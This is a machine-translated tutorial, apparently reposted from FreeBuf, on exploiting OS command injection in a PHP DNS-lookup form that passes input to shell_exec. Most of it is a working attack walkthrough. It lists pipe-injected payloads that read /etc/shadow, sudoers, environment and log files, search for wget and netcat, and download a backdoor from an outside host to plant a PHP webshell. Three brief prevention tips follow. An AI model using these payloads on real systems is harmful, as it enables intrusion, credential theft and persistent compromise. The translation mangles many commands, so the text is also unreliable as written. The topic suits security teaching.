Malicious code injection using input boxes

Source: Internet
Author: User
Tags echo command nslookup

Now let's take a look:
This is a website interface for querying DNS services. You can enter an IP address or a host name in the input box to query.


The implementation of his code is not complex, as shown below:
<? Php
If (isset ($ _ POST ["dns-lookup-php-submit-button"]) {
Try {
If ($ targethost_validated ){
Echo shell_exec ("nslookup". $ targethost );
$ LogHandler-> writeToLog ($ conn, "Executed operating system command: nslookup". $ lTargetHostText );
} Else {
Echo '<script> document. getElementById ("id-bad-cred-tr"). style. display = "" </script> ';
} // End if ($ targethost_validated ){
} Catch (Exception $ e ){
Echo $ CustomErrorHandler-> FormatError ($ e, "Input:". $ targethost );
} // End try
} // End if (isset ($ _ POST ))
?>
Www.2cto.com

Now, we try to query an IP address 74.125.31.102.



In the previous Code, have you found the shell_exec () function?
Now you should understand how this query interface is implemented, that is, it is very easy to execute system commands through shell_exec ("nslookup". $ targethost.

Next, we will try to inject malicious code.

In LINUX, "&" can be used to connect commands. ";" is the command separator.

Now, we will use the echo command to make some attempts, and I personally prefer to use "|" instead of "&". The specific reason is described below.



| Echo 'hello': The above command is actually executed in the same way as nslookup | echo 'hello' in the terminal.




Why do I use the pipeline operator "|" instead? It will be explained to you.


Next we try to get more server information. Because we used the command uname-a before, we can identify the system information, such as Linux kernel release 3.0.0-1, the host name of the network contact is projectX, and the operating system is GNU/Linux... Let's check which linux server is used:
| Cat/etc/issue
| Cat/etc/*-release
| Cat/etc/lsb-release
| Cat/etc/redhat-release


Ha, this is a BackBox, which is my favorite linux release. :) Let's see under which directory we are located:
| Pwd; ls-la




To collect more information, we need to check the services running on the server.
| Ps aux
| Ps-ef
 
| Top
 
| Cat/etc/service





 

To further discover vulnerabilities in the system, penetration tests are conducted using methods such as exploit.
You may need the following commands:
| Cat/etc/environment
| Cat/proc/self/environ <em> | cat/etc/shadow </em>
 
| Cat/etc/sudoers
| Cat/etc/group
 
| Cat/etc/security/group
| Cat/etc/security/passwd
| Cat/etc/security/user
| Cat/etc/security/environ
| Cat/etc/security/limits
| Cat/usr/lib/security/mkuser. default
 
| Cat/var/log/messages
| Cat var/log/mysql. log
| Cat/var/log/user. log
| Cat/var/www/logs/error_log
 
| Cat/etc/syslog. conf
| Cat/etc/chttp. conf
| Cat/etc/lighttpd. conf
| Cat/etc/cups/cupsd. conf
| Cat/etc/inetd. conf
| Cat/etc/apache2/apache2.conf
 
| Cat/var/log/apache2/error. log
| Cat/etc/my. conf
| Cat/etc/httpd/conf/httpd. conf
| Cat/opt/lampp/etc/httpd. conf
| Ls-aRl/etc/| awk '$1 ~ /^. * R .*/
 
| Cat/etc/resolv. conf
| Cat/etc/sysconfig/network
| Cat/etc/networks
 
|/Sbin/ifconfig-
| Cat/etc/network/interfaces
 
| S-alh/var/spool/cron
| Ls-al/etc/| grep cron
| Ls-al/etc/cron *
| Cat/etc/cron *
| Cat/etc/at. allow
| Cat/etc/at. deny
| Cat/etc/cron. allow
| Cat/etc/cron. deny
| Cat/etc/crontab
| Cat/etc/anacrontab
| Cat/var/spool/cron/crontabs/root

Many attackers are willing to leave backdoors on Linux servers, so they need to try which files can be uploaded.
| Find/-name wget
| Find/-name nc *
| Find/-name netcat *
| Find/-name tftp *
| Find/-name ftp: wget a txt file
| Wget http://freebuf.com/thanks/ <em> unixhck </em>. txt

Succeeded







Well, in this case, we will naturally be a webshell for wget.
| Wget http://freebuf.com/backdoor.txtrename
| Cp backdoor.txt backdoor. php

View our shell

Several TIPS to prevent remote code execution:
1. Disable the shell_exec () function
2. If you really need to use the shell_exec () function, we recommend that you use escapeshellarg () and escapeshellcmd () for filtering.
3. Use the WAF or mod_security modules for interception and filtering

From FreebuF. COM

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.